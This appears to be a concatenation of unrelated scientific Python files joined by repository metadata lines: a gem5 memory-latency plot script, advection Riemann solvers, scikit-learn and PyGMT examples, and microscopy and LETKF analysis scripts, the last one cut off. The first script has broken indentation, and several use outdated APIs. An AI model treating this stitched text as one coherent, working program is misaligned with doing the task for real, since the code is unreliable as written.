# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Hansson
try:
import matplotlib.pyplot as plt
import matplotlib as mpl
import numpy as np
except ImportError:
print "Failed to import matplotlib and numpy"
exit(-1)
import sys
import re
# This script is intended to post process and plot the output from
# running configs/dram/lat_mem_rd.py, as such it parses the simout and
# stats.txt to get the relevant data points.
def main():
    """Parse gem5's simout/stats.txt from lat_mem_rd and plot read latency."""
    if len(sys.argv) != 2:
        print "Usage: ", sys.argv[0], "<simout directory>"
        exit(-1)
    try:
        stats = open(sys.argv[1] + '/stats.txt', 'r')
    except IOError:
        print "Failed to open ", sys.argv[1] + '/stats.txt', " for reading"
        exit(-1)
    try:
        simout = open(sys.argv[1] + '/simout', 'r')
    except IOError:
        print "Failed to open ", sys.argv[1] + '/simout', " for reading"
        exit(-1)
    # Get the address ranges (in kB) printed after the header line.
    got_ranges = False
    ranges = []
    iterations = 1
    for line in simout:
        if got_ranges:
            ranges.append(int(line) / 1024)
        match = re.match("lat_mem_rd with (\d+) iterations, ranges:.*", line)
        if match:
            got_ranges = True
            iterations = int(match.groups(0)[0])
    simout.close()
    if not got_ranges:
        print "Failed to get address ranges, ensure simout is up-to-date"
        exit(-1)
    # Now parse the stats
    raw_rd_lat = []
    for line in stats:
        match = re.match(".*readLatencyHist::mean\s+(.+)\s+#.*", line)
        if match:
            # The /1000 matches the ns y-axis label below; presumably the
            # raw stat is in ps -- confirm against the gem5 config.
            raw_rd_lat.append(float(match.groups(0)[0]) / 1000)
    stats.close()
    # The stats also contain the warming, so filter the latency stats
    # (every (iterations+1)-th sample is warm-up and is dropped).
    i = 0
    filtered_rd_lat = []
    for l in raw_rd_lat:
        if i % (iterations + 1) == 0:
            pass
        else:
            filtered_rd_lat.append(l)
        i = i + 1
    # Next we need to take care of the iterations
    rd_lat = []
    for i in range(iterations):
        rd_lat.append(filtered_rd_lat[i::iterations])
    # Keep the minimum latency observed across iterations for each range.
    final_rd_lat = map(lambda p: min(p), zip(*rd_lat))
    # Sanity check
    if not (len(ranges) == len(final_rd_lat)):
        print "Address ranges (%d) and read latency (%d) do not match" % \
            (len(ranges), len(final_rd_lat))
        exit(-1)
    for (r, l) in zip(ranges, final_rd_lat):
        print r, round(l, 2)
    # lazy version to check if an integer is a power of two
    def is_pow2(num):
        return num != 0 and ((num & (num - 1)) == 0)
    plt.semilogx(ranges, final_rd_lat)
    # create human readable labels (only at power-of-two ranges)
    xticks_locations = [r for r in ranges if is_pow2(r)]
    xticks_labels = []
    for x in xticks_locations:
        if x < 1024:
            xticks_labels.append('%d kB' % x)
        else:
            xticks_labels.append('%d MB' % (x / 1024))
    plt.xticks(xticks_locations, xticks_labels, rotation=-45)
    plt.minorticks_off()
    plt.xlim((xticks_locations[0], xticks_locations[-1]))
    plt.ylabel("Latency (ns)")
    plt.grid(True)
    plt.show()
if __name__ == "__main__":
    main()
| bsd-3-clause |
maojrs/riemann_book | exact_solvers/advection.py | 3 | 1870 |
import sys, os
import matplotlib.pyplot as plt
import numpy as np
from utils import riemann_tools
from ipywidgets import interact
from ipywidgets import widgets
def characteristics(a=1.):
    """Plot the characteristic lines x - a*t = C on the unit square."""
    x = np.linspace(-2*np.abs(a)-1,2*np.abs(a)+1,41)
    t = np.linspace(0,1,20)
    # One thin black line per characteristic foot point.
    for ix in x:
        plt.plot(ix+a*t,t,'-k',lw=0.5)
    plt.xlim(0,1)
    plt.ylim(0,1)
    plt.title('Characteristics $x-at=C$')
    plt.xlabel('$x$')
    plt.ylabel('$t$')
def solution(a=1.):
    """Plot a Gaussian pulse advected along the characteristics."""
    characteristics(a)
    plt.title('Propagation along characteristics')
    xx = np.linspace(-2*np.abs(a),2*np.abs(a)+1,1000)
    q = 0.1*np.exp(-100*(xx-0.5)**2)
    plt.plot(xx,q,'-r')
    # Stack time snapshots: each is shifted by a*spacing horizontally and
    # offset by spacing vertically so the sequence is visible.
    spacing = 0.04
    number = 20
    for i in range(number):
        plt.plot(xx+spacing*i*a,q+spacing*i,'-r')
def riemann_demo(a=1.):
    """Plot the Riemann solution: a jump advected at constant speed a."""
    characteristics(a)
    plt.xlim(-0.8,0.8)
    plt.title('Solution of the Riemann problem')
    xx = np.linspace(-2*np.abs(a)-1,2*np.abs(a)+1,1000)
    #q = 0.05+0.05*(xx<0.)
    q = 0.05*(xx<0.)
    # Stack time snapshots of the step, each shifted by a*spacing.
    spacing = 0.04
    number = 20
    for i in range(number):
        plt.plot(xx+spacing*i*a,q+spacing*i,'-r')
def riemann_solution(q_l, q_r, a=1.):
    """
    Solve the Riemann problem for the advection equation, with velocity a.

    Returns
    -------
    states : (1, 2) array holding the left and right states
    speeds : list with the single wave speed, [a]
    reval : callable mapping similarity coordinates xi = x/t to q(xi)
    wave_types : ['contact'] (advection carries a contact discontinuity)
    """
    states = np.array([[q_l, q_r]])
    speeds = [a]
    wave_types = ['contact']
    def reval(xi):
        # Left state ahead of the wave (xi < a), right state otherwise.
        q_vals = np.zeros((1, len(xi)))
        q_vals[0, :] = np.where(np.asarray(xi) < a, q_l, q_r)
        return q_vals
    return states, speeds, reval, wave_types
def plot_riemann_solution(ql, qr, a):
    """Interactive ipywidgets plot of the advection Riemann solution."""
    # Characteristic speed is constant (= a) for linear advection.
    c = lambda q, xi: a
    soln = riemann_solution(ql ,qr, a)
    plot_advection = riemann_tools.make_plot_function(*soln,
                                                      plot_chars=[c])
    return interact(plot_advection,
                    t=widgets.FloatSlider(value=0.0,min=0,max=1.0),
                    which_char=widgets.fixed(True))
| bsd-3-clause |
btabibian/scikit-learn | examples/model_selection/grid_search_text_feature_extraction.py | 99 | 4163 |
"""
==========================================================
Sample pipeline for text feature extraction and evaluation
==========================================================
The dataset used in this example is the 20 newsgroups dataset which will be
automatically downloaded and then cached and reused for the document
classification example.
You can adjust the number of categories by giving their names to the dataset
loader or setting them to None to get the 20 of them.
Here is a sample output of a run on a quad-core machine::
Loading 20 newsgroups dataset for categories:
['alt.atheism', 'talk.religion.misc']
1427 documents
2 categories
Performing grid search...
pipeline: ['vect', 'tfidf', 'clf']
parameters:
{'clf__alpha': (1.0000000000000001e-05, 9.9999999999999995e-07),
'clf__n_iter': (10, 50, 80),
'clf__penalty': ('l2', 'elasticnet'),
'tfidf__use_idf': (True, False),
'vect__max_n': (1, 2),
'vect__max_df': (0.5, 0.75, 1.0),
'vect__max_features': (None, 5000, 10000, 50000)}
done in 1737.030s
Best score: 0.940
Best parameters set:
clf__alpha: 9.9999999999999995e-07
clf__n_iter: 50
clf__penalty: 'elasticnet'
tfidf__use_idf: True
vect__max_n: 2
vect__max_df: 0.75
vect__max_features: 50000
"""
# Author: Olivier Grisel <olivier.grisel@ensta.org>
# Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Mathieu Blondel <mathieu@mblondel.org>
# License: BSD 3 clause
from __future__ import print_function
from pprint import pprint
from time import time
import logging
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.linear_model import SGDClassifier
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline
print(__doc__)
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(levelname)s %(message)s')

###############################################################################
# Load some categories from the training set
categories = [
    'alt.atheism',
    'talk.religion.misc',
]
# Uncomment the following to do the analysis on all the categories
#categories = None

print("Loading 20 newsgroups dataset for categories:")
print(categories)

# Download (or read from the local cache) the training split restricted to
# the two categories above.
data = fetch_20newsgroups(subset='train', categories=categories)
print("%d documents" % len(data.filenames))
print("%d categories" % len(data.target_names))
print()
###############################################################################
# define a pipeline combining a text feature extractor with a simple
# classifier
# Text-classification pipeline: raw documents -> token counts -> tf-idf
# weights -> linear classifier trained with stochastic gradient descent.
pipeline = Pipeline([
    ('vect', CountVectorizer()),
    ('tfidf', TfidfTransformer()),
    ('clf', SGDClassifier()),
])

# uncommenting more parameters will give better exploring power but will
# increase processing time in a combinatorial way
parameters = {
    # ignore terms appearing in more than this fraction of the documents
    'vect__max_df': (0.5, 0.75, 1.0),
    #'vect__max_features': (None, 5000, 10000, 50000),
    'vect__ngram_range': ((1, 1), (1, 2)),  # unigrams or bigrams
    #'tfidf__use_idf': (True, False),
    #'tfidf__norm': ('l1', 'l2'),
    # regularization strength and penalty type for the SGD classifier
    'clf__alpha': (0.00001, 0.000001),
    'clf__penalty': ('l2', 'elasticnet'),
    #'clf__n_iter': (10, 50, 80),
}
if __name__ == "__main__":
    # multiprocessing requires the fork to happen in a __main__ protected
    # block

    # find the best parameters for both the feature extraction and the
    # classifier
    grid_search = GridSearchCV(pipeline, parameters, n_jobs=-1, verbose=1)

    print("Performing grid search...")
    print("pipeline:", [name for name, _ in pipeline.steps])
    print("parameters:")
    pprint(parameters)
    t0 = time()
    # Exhaustively evaluate every parameter combination with cross-validation
    # (this is the expensive step; ~29 minutes in the sample run above).
    grid_search.fit(data.data, data.target)
    print("done in %0.3fs" % (time() - t0))
    print()

    print("Best score: %0.3f" % grid_search.best_score_)
    print("Best parameters set:")
    best_parameters = grid_search.best_estimator_.get_params()
    for param_name in sorted(parameters.keys()):
        print("\t%s: %r" % (param_name, best_parameters[param_name]))
| bsd-3-clause |
bikong2/scikit-learn | examples/svm/plot_svm_anova.py | 250 | 2000 | """
=================================================
SVM-Anova: SVM with univariate feature selection
=================================================
This example shows how to perform univariate feature selection before running a SVC
(support vector classifier) to improve the classification scores.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn import svm, datasets, feature_selection, cross_validation
from sklearn.pipeline import Pipeline
###############################################################################
# Import some data to play with
digits = datasets.load_digits()
y = digits.target
# Throw away data, to be in the curse of dimension settings
y = y[:200]
X = digits.data[:200]
n_samples = len(y)
X = X.reshape((n_samples, -1))
# add 200 non-informative features so that feature selection has noise to prune
X = np.hstack((X, 2 * np.random.random((n_samples, 200))))

###############################################################################
# Create a feature-selection transform and an instance of SVM that we
# combine together to have a full-blown estimator
transform = feature_selection.SelectPercentile(feature_selection.f_classif)

clf = Pipeline([('anova', transform), ('svc', svm.SVC(C=1.0))])

###############################################################################
# Plot the cross-validation score as a function of percentile of features
# NOTE(review): `cross_validation` is the pre-0.18 sklearn module (replaced
# by `model_selection` in later versions) -- confirm the target version.
score_means = list()
score_stds = list()
percentiles = (1, 3, 6, 10, 15, 20, 30, 40, 60, 80, 100)

for percentile in percentiles:
    clf.set_params(anova__percentile=percentile)
    # Compute the cross-validation score for this percentile
    # (n_jobs=1: a single CPU is used)
    this_scores = cross_validation.cross_val_score(clf, X, y, n_jobs=1)
    score_means.append(this_scores.mean())
    score_stds.append(this_scores.std())

# Error-bar plot: mean CV score +/- one standard deviation per percentile.
plt.errorbar(percentiles, score_means, np.array(score_stds))

plt.title(
    'Performance of the SVM-Anova varying the percentile of features selected')
plt.xlabel('Percentile')
plt.ylabel('Prediction rate')

plt.axis('tight')
plt.show()
| bsd-3-clause |
GenericMappingTools/gmt-python | examples/tutorials/subplots.py | 1 | 10360 | """
Making subplots
===============
When you're preparing a figure for a paper, there will often be times when
you'll need to put many individual plots into one large figure, and label them
'abcd'. These individual plots are called subplots.
There are two main ways to create subplots in GMT:
- Use :meth:`pygmt.Figure.shift_origin` to manually move each individual plot
to the right position.
- Use :meth:`pygmt.Figure.subplot` to define the layout of the subplots.
The first method is easier to use and should handle simple cases involving a
couple of subplots. For more advanced subplot layouts, however, we recommend the
use of :meth:`pygmt.Figure.subplot` which offers finer grained control, and
this is what the tutorial below will cover.
"""
# sphinx_gallery_thumbnail_number = 3
import pygmt
###############################################################################
#
# Let's start by initializing a :class:`pygmt.Figure` instance.
fig = pygmt.Figure()
###############################################################################
# Define subplot layout
# ---------------------
#
# The :meth:`pygmt.Figure.subplot` function is used to set up the layout, size,
# and other attributes of the figure. It divides the whole canvas into regular
# grid areas with *n* rows and *m* columns. Each grid area can contain an
# individual subplot. For example:
###############################################################################
# .. code-block:: default
#
# with fig.subplot(nrows=2, ncols=3, figsize=("15c", "6c"), frame="lrtb"):
# ...
###############################################################################
# will define our figure to have a 2 row and 3 column grid layout.
# ``figsize=("15c", "6c")`` defines the overall size of the figure to be 15 cm
# wide by 6 cm high. Using ``frame="lrtb"`` allows us to customize the map frame
# for all subplots instead of setting them individually. The figure layout will
# look like the following:
with fig.subplot(nrows=2, ncols=3, figsize=("15c", "6c"), frame="lrtb"):
    for i in range(2):  # row number starting from 0
        for j in range(3):  # column number starting from 0
            index = i * 3 + j  # index number starting from 0
            with fig.set_panel(panel=index):  # sets the current panel
                # Annotate each panel with its index/row/column at the
                # Middle Center ("MC") of a unit region.
                fig.text(
                    position="MC",
                    text=f"index: {index}; row: {i}, col: {j}",
                    region=[0, 1, 0, 1],
                )
fig.show()
###############################################################################
# The :meth:`pygmt.Figure.set_panel` function activates a specified subplot, and
# all subsequent plotting functions will take place in that subplot panel. This
# is similar to matplotlib's ``plt.sca`` method. In order to specify a subplot,
# you will need to provide the identifier for that subplot via the ``panel``
# parameter. Pass in either the *index* number, or a tuple/list like
# (*row*, *col*) to ``panel``.
###############################################################################
# .. note::
#
# The row and column numbering starts from 0. So for a subplot layout with
# N rows and M columns, row numbers will go from 0 to N-1, and column
# numbers will go from 0 to M-1.
###############################################################################
# For example, to activate the subplot on the top right corner (index: 2) at
# *row*\=0 and *col*\=2, so that all subsequent plotting commands happen
# there, you can use the following command:
###############################################################################
# .. code-block:: default
#
# with fig.set_panel(panel=[0, 2]):
# ...
###############################################################################
# Making your first subplot
# -------------------------
# Next, let's use what we learned above to make a 2 row by 2 column subplot
# figure. We'll also pick up on some new parameters to configure our subplot.
fig = pygmt.Figure()

with fig.subplot(
    nrows=2,
    ncols=2,
    figsize=("15c", "6c"),
    autolabel=True,
    frame=["af", "WSne"],
    margins=["0.1c", "0.2c"],
    title="My Subplot Heading",
):
    # One basemap per panel; projection "X?" lets GMT choose the frame size
    # automatically for each panel.
    fig.basemap(region=[0, 10, 0, 10], projection="X?", panel=[0, 0])
    fig.basemap(region=[0, 20, 0, 10], projection="X?", panel=[0, 1])
    fig.basemap(region=[0, 10, 0, 20], projection="X?", panel=[1, 0])
    fig.basemap(region=[0, 20, 0, 20], projection="X?", panel=[1, 1])
fig.show()
###############################################################################
# In this example, we define a 2-row, 2-column (2x2) subplot layout using
# :meth:`pygmt.Figure.subplot`. The overall figure dimensions are set to be
# 15 cm wide and 6 cm high (``figsize=["15c", "6c"]``). In addition, we use
# some optional parameters to fine-tune some details of the figure creation:
#
# - ``autolabel=True``: Each subplot is automatically labelled abcd
# - ``margins=["0.1c", "0.2c"]``: adjusts the space between adjacent subplots.
# In this case, it is set as 0.1 cm in the X direction and 0.2 cm in the Y
# direction.
# - ``title="My Subplot Heading"``: adds a title on top of the whole figure.
#
# Notice that each subplot was set to use a linear projection ``"X?"``.
# Usually, we need to specify the width and height of the map frame, but it is
# also possible to use a question mark ``"?"`` to let GMT decide automatically
# on what is the most appropriate width/height for the each subplot's map
# frame.
###############################################################################
# .. tip::
#
# In the above example, we used the following commands to activate the
# four subplots explicitly one after another::
#
# fig.basemap(..., panel=[0, 0])
# fig.basemap(..., panel=[0, 1])
# fig.basemap(..., panel=[1, 0])
# fig.basemap(..., panel=[1, 1])
#
# In fact, we can just use ``fig.basemap(..., panel=True)`` without
# specifying any subplot index number, and GMT will automatically activate
# the next subplot panel.
###############################################################################
# .. note::
#
# All plotting functions (e.g. :meth:`pygmt.Figure.coast`,
# :meth:`pygmt.Figure.text`, etc) are able to use ``panel`` parameter when
# in subplot mode. Once a panel is activated using ``panel`` or
# :meth:`pygmt.Figure.set_panel`, subsequent plotting commands that don't
# set a ``panel`` will have their elements added to the same panel as
# before.
###############################################################################
# Shared X and Y axis labels
# --------------------------
# In the example above with the four subplots, the two subplots for each row
# have the same Y-axis range, and the two subplots for each column have the
# same X-axis range. You can use the ``sharex``/``sharey`` parameters to set a
# common X and/or Y axis between subplots.
fig = pygmt.Figure()

with fig.subplot(
    nrows=2,
    ncols=2,
    figsize=("15c", "6c"),  # width of 15 cm, height of 6 cm
    autolabel=True,
    margins=["0.3c", "0.2c"],  # horizontal 0.3 cm and vertical 0.2 cm margins
    title="My Subplot Heading",
    sharex="b",  # shared x-axis on the bottom side
    sharey="l",  # shared y-axis on the left side
    frame="WSrt",
):
    # panel=True advances to the next panel automatically, so no explicit
    # (row, col) indices are needed here.
    fig.basemap(region=[0, 10, 0, 10], projection="X?", panel=True)
    fig.basemap(region=[0, 20, 0, 10], projection="X?", panel=True)
    fig.basemap(region=[0, 10, 0, 20], projection="X?", panel=True)
    fig.basemap(region=[0, 20, 0, 20], projection="X?", panel=True)
fig.show()
###############################################################################
# ``sharex="b"`` indicates that subplots in a column will share the x-axis, and
# only the **b**\ ottom axis is displayed. ``sharey="l"`` indicates that
# subplots within a row will share the y-axis, and only the **l**\ eft axis is
# displayed.
#
# Of course, instead of using the ``sharex``/``sharey`` option, you can also
# set a different ``frame`` for each subplot to control the axis properties
# individually for each subplot.
###############################################################################
# Advanced subplot layouts
# ------------------------
#
# Nested subplots are currently not supported. If you want to create more
# complex subplot layouts, some manual adjustments are needed.
#
# The following example draws three subplots in a 2-row, 2-column layout, with
# the first subplot occupying the first row.
fig = pygmt.Figure()

# Bottom row, two subplots (labelled starting from "b)")
with fig.subplot(nrows=1, ncols=2, figsize=("15c", "3c"), autolabel="b)"):
    fig.basemap(
        region=[0, 5, 0, 5], projection="X?", frame=["af", "WSne"], panel=[0, 0]
    )
    fig.basemap(
        region=[0, 5, 0, 5], projection="X?", frame=["af", "WSne"], panel=[0, 1]
    )

# Move plot origin by 1 cm above the height of the entire figure
fig.shift_origin(yshift="h+1c")

# Top row, one subplot spanning the full width (labelled "a)")
with fig.subplot(nrows=1, ncols=1, figsize=("15c", "3c"), autolabel="a)"):
    fig.basemap(
        region=[0, 10, 0, 10], projection="X?", frame=["af", "WSne"], panel=[0, 0]
    )
    fig.text(text="TEXT", x=5, y=5)

fig.show()
###############################################################################
#
# We start by drawing the bottom two subplots, setting ``autolabel="b)"`` so
# that the subplots are labelled 'b)' and 'c)'. Next, we use
# :meth:`pygmt.Figure.shift_origin` to move the plot origin 1 cm above the
# **h**\ eight of the entire figure that is currently plotted (i.e. the bottom
# row subplots). A single subplot is then plotted on the top row. You may need
# to adjust the ``yshift`` parameter to make your plot look nice. This top row
# uses ``autolabel="a)"``, and we also plotted some text inside. Note that
# ``projection="X?"`` was used to let GMT automatically determine the size of
# the subplot according to the size of the subplot area.
###############################################################################
# You can also manually override the ``autolabel`` for each subplot using for
# example, ``fig.set_panel(..., fixedlabel="b) Panel 2")`` which would allow
# you to manually label a single subplot as you wish. This can be useful for
# adding a more descriptive subtitle to individual subplots.
| bsd-3-clause |
nicolagritti/ACVU_project | source/03cropImages.py | 1 | 1947 | import glob
from tifffile import *
from generalFunctions import *
import numpy as np
import os.path
import matplotlib.pyplot as plt
import pickle
import scipy.interpolate as ip
from scipy.stats import gaussian_kde
from scipy import interpolate
import shutil
import os
import matplotlib as mpl
mpl.rcParams['pdf.fonttype'] = 42
def cropImages(path, worm, channels=('488nm', 'CoolLED', '561nm'), size=512):
    """Crop every raw Z-stack of one worm around its marked gonad position.

    Parameters
    ----------
    path : str
        Experiment directory containing the worm's pickle files and raw images.
    worm : str
        Worm identifier, e.g. ``'C14'``.
    channels : sequence of str, optional
        Imaging channels to process; each one is a suffix of the raw tif file
        names.  (A tuple default avoids the mutable-default-argument pitfall;
        any iterable of strings still works for callers.)
    size : int, optional
        Side length (pixels) of the square crop passed to ``crop_image``.

    Side effects: copies the per-timepoint metadata ``.txt`` files and writes
    cropped 16-bit tif stacks into ``<path>/<worm>_analyzedImages``.  Stacks
    that already exist there are skipped, so the function is re-runnable.
    """
    print(path, worm)

    rawImgsPath = os.path.join(path, worm)

    # load pickle files with per-worm parameters, timepoints and gonad positions
    # NOTE(review): paramsDF is loaded but never used below -- kept so a
    # missing params pickle still fails loudly; confirm before removing.
    paramsDF = load_data_frame(path, worm + '_01params.pickle')
    timesDF = load_data_frame(path, worm + '_01times.pickle')
    gpDF = load_data_frame(path, worm + '_02gonadPos.pickle')

    # build the movie for each of the input channels
    outpath = os.path.join(path, worm + '_analyzedImages')

    for channel in channels:
        for idx, row in timesDF.iterrows():
            # extract gonad position for this timepoint
            gp = extract_pos(gpDF.ix[gpDF.tidx == row.tidxRel].squeeze())

            # only process timepoints where the gonad is marked (no NaNs)
            if not np.sum(np.isnan(gp)):
                print(row.tidxRel, row.timesRel, row.fName + channel + '.tif')

                # copy metadata file once per timepoint
                if not os.path.isfile(os.path.join(outpath, row.fName + '.txt')):
                    shutil.copyfile(
                        os.path.join(rawImgsPath, row.fName + '.txt'),
                        os.path.join(outpath, row.fName + '.txt'))

                # skip stacks that were already cropped in a previous run
                if not os.path.isfile(os.path.join(outpath, row.fName + channel + '.tif')):
                    # load the Z-stack
                    imgs = load_stack(os.path.join(rawImgsPath, row.fName + channel + '.tif'))
                    # crop the Z-stack around the gonad position
                    cropstack = crop_image(imgs, gp, size)
                    # save the cropped Z-stack as 16-bit tif
                    imsave(os.path.join(outpath, row.fName + channel + '.tif'),
                           cropstack.astype(np.uint16))
if __name__ == '__main__':
    # Experiment folder and the worms to process in this run.
    path = 'X:\\Simone\\160129_MCHERRY_HLH2GFP_onHB101'
    worms = ['C14', 'C15', 'C16', 'C17', 'C18', 'C19']
    # (removed dead leftover `wprms = ['C16']` -- it was never read)
    for w in worms:
        cropImages(path=path, worm=w, channels=['488nm', 'CoolLED', '561nm'])
| gpl-3.0 |
gustfrontar/LETKF_WRF | wrf/verification/python/plot_letkfpertamp_timeseries.py | 1 | 7226 | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 1 18:45:15 2016
@author:
"""
# LECTURA Y GRAFICADO RADAR (Formato binario GVAR-SMN)
import numpy as np
import matplotlib.pyplot as plt
import datetime as dt
import binary_io as bio
import bred_vector_functions as bvf
import os
basedir='/data9/jruiz/EXPERIMENTS/'
expname = '/OsakaPAR_1km_control1000m_smallrandompert_new/'
plotbasedir=basedir + expname + '/plots/'
inipert=1 #Initial perturbation to plot.
endpert=1 #Final perturbation to plot.
npert=endpert-inipert + 1
undef_out=np.nan #This is the undef value that we will use internally.
undef_in=1.0e20 #This is the undef value in the original data (or at least a big number that is lower than the real undef value).
#The following will be used to extract a particlar variable from the original data.
#This variables should be especified according to the data that we have in the binary files.
ctl_vars='U','V','W','T','QV','QHYD' #Complete list of variables in ctl file.
ctl_inirecord=[0,12,24,36,48,60] #Starting record for each variable. From 0 to N
ctl_endrecord=[11,23,35,47,59,71] #End record for each variable. From 0 to N.
#Which variables and levels are we going to plot?
plotlevels=np.array([3,7,9]) #Which levels will be plotted (this levels are equivalent to the BV plots)
plotvars='UV','V','W','T','QV','QHYD' #Which variables will be plotted.
#Define regions
lati=np.array([34.75,34.6])
late=np.array([35.25,34.9])
loni=np.array([135.5,135.4])
lone=np.array([136.25,135.7])
reg_name='REG_1','REG_2','TOTAL'
smooth_type='None'
smooth_sigma=np.array([1.5])
#Create the plotbasedir
if not os.path.exists(plotbasedir):
os.mkdir(plotbasedir)
#Defini initial and end times using datetime module.
itime = dt.datetime(2013,7,13,5,10,30) #Initial time.
etime = dt.datetime(2013,7,13,5,40,00) #End time.
#Define the delta.
delta=dt.timedelta(seconds=30)
nx=180
ny=180
nz=np.max(ctl_endrecord) + 1 #Total number of records in binary file.
nlev=12 #Number of vertical levels for 3D variables.
ntimes=1 + np.around((etime-itime).seconds / delta.seconds).astype(int) #Total number of times.
ctime = itime + delta
# Containers for the fields read at each time step.
data_pert_gues=dict()
data_mean_gues=dict()
data_pert_anal=dict()
data_mean_anal=dict()

#Get lat lon.
lat=bio.read_data_direct(basedir + expname + '/latlon/lat.grd',nx,ny,1,'>f4')[:,:,0]
lon=bio.read_data_direct(basedir + expname + '/latlon/lon.grd',nx,ny,1,'>f4')[:,:,0]

# NOTE(review): the four time_* arrays below do not appear to be used in the
# rest of this script -- confirm before removing.
time_mean_growth_rate=np.zeros([nx,ny,nlev])
time_sprd_growth_rate=np.zeros([nx,ny,nlev])
time_mean_norm=np.zeros([nx,ny,nlev])
time_sprd_norm=np.zeros([nx,ny,nlev])

#Convert lat lon to the nearest grid point.
#Add the global domain as a region.
lati=np.append(lati,lat[0,0])
late=np.append(late,lat[nx-1,ny-1])
loni=np.append(loni,lon[0,0])
lone=np.append(lone,lon[nx-1,ny-1])

xi , yi = bvf.lat_lon_to_i_j(lon,lat,loni,lati)
xe , ye = bvf.lat_lon_to_i_j(lon,lat,lone,late)

nregs=xi.shape[0]

# Per-variable norm statistics: dictionaries keyed by variable name, each
# holding an array of shape [ntimes, npert, nregs].
norm_mean_gues=dict()
norm_max_gues=dict()
norm_min_gues=dict()
norm_mean_anal=dict()
norm_max_anal=dict()
norm_min_anal=dict()

# NOTE(review): the gr_letkfpert_* growth-rate arrays are allocated but never
# filled in this script -- presumably leftovers; confirm.
gr_letkfpert_mean=dict()
gr_letkfpert_min=dict()
gr_letkfpert_max=dict()

#Allocate memory for the dictionaries.
for myvar in plotvars :
    norm_mean_gues[myvar]=np.zeros([ntimes,npert,nregs])
    norm_max_gues[myvar]=np.zeros([ntimes,npert,nregs])
    norm_min_gues[myvar]=np.zeros([ntimes,npert,nregs])
    norm_mean_anal[myvar]=np.zeros([ntimes,npert,nregs])
    norm_max_anal[myvar]=np.zeros([ntimes,npert,nregs])
    norm_min_anal[myvar]=np.zeros([ntimes,npert,nregs])
    gr_letkfpert_mean[myvar]=np.zeros([ntimes,npert,nregs])
    gr_letkfpert_min[myvar]=np.zeros([ntimes,npert,nregs])
    gr_letkfpert_max[myvar]=np.zeros([ntimes,npert,nregs])
# Main read loop: for every LETKF perturbation member and every analysis
# time, load the perturbed/mean first-guess and analysis fields and
# accumulate the perturbation norms per region.
# NOTE(review): `ctime` is advanced inside the while loop and is NOT reset
# per member, so the time loop only runs fully for the first member; this is
# harmless while inipert == endpert == 1, but confirm before widening the
# member range.
for ipert in range (inipert , endpert + 1):
    pertstr="%04d" % ipert
    #print( ' Plotting bred vector number ' + bvstr )
    while ( ctime <= etime ):
        # Time index relative to itime.  NOTE(review): under Python 3 this
        # is float division -- confirm an integer index was intended.
        it = ( ctime - itime ).seconds / delta.seconds
        print ( 'The date is :', ctime )

        print ( 'Reading the perturbed gues' )
        my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/guesgp/' + '/' + pertstr + '.grd'
        data_pert_gues=bio.read_data_scale_2( my_file , nx , ny , nz , ctl_vars , ctl_inirecord , ctl_endrecord ,dtypein='f4',undef_in=undef_in,undef_out=undef_out)

        print ( 'Reading the mean gues')
        my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/guesgp/' + '/mean.grd'
        data_mean_gues=bio.read_data_scale_2(my_file,nx,ny,nz,ctl_vars,ctl_inirecord,ctl_endrecord,dtypein='f4',undef_in=undef_in,undef_out=undef_out)

        print ( 'Reading the perturbed anal' )
        my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/analgp/' + '/' + pertstr + '.grd'
        data_pert_anal=bio.read_data_scale_2(my_file,nx,ny,nz,ctl_vars,ctl_inirecord,ctl_endrecord,dtypein='f4',undef_in=undef_in,undef_out=undef_out)

        print ( 'Reading the mean anal')
        my_file=basedir + expname + ctime.strftime("%Y%m%d%H%M%S") + '/analgp/' + '/mean.grd'
        data_mean_anal=bio.read_data_scale_2(my_file,nx,ny,nz,ctl_vars,ctl_inirecord,ctl_endrecord,dtypein='f4',undef_in=undef_in,undef_out=undef_out)

        # Per-variable perturbation norms (regional mean/max/min) for both
        # the first guess and the analysis.
        for my_var in plotvars :
            norm_mean_gues[my_var][it,ipert-1,:],norm_max_gues[my_var][it,ipert-1,:],norm_min_gues[my_var][it,ipert-1,:],norm_gues=bvf.norm_bv( data_pert_gues , data_mean_gues , norm_type=my_var , smooth=smooth_type , sigma=smooth_sigma , xi=xi , yi=yi , xe=xe , ye=ye )
            norm_mean_anal[my_var][it,ipert-1,:],norm_max_anal[my_var][it,ipert-1,:],norm_min_anal[my_var][it,ipert-1,:],norm_anal=bvf.norm_bv( data_pert_anal , data_mean_anal , norm_type=my_var , smooth=smooth_type , sigma=smooth_sigma , xi=xi , yi=yi , xe=xe , ye=ye )

        ctime = ctime + delta
        # NOTE(review): `it` is recomputed from ctime at the top of the loop,
        # so this increment is a dead store -- confirm before removing.
        it = it + 1

print ( "Finish time loop" )
# Plotting section: build a "sawtooth" series alternating analysis and
# first-guess norms, then emit one figure per (variable, region).
mybv=0
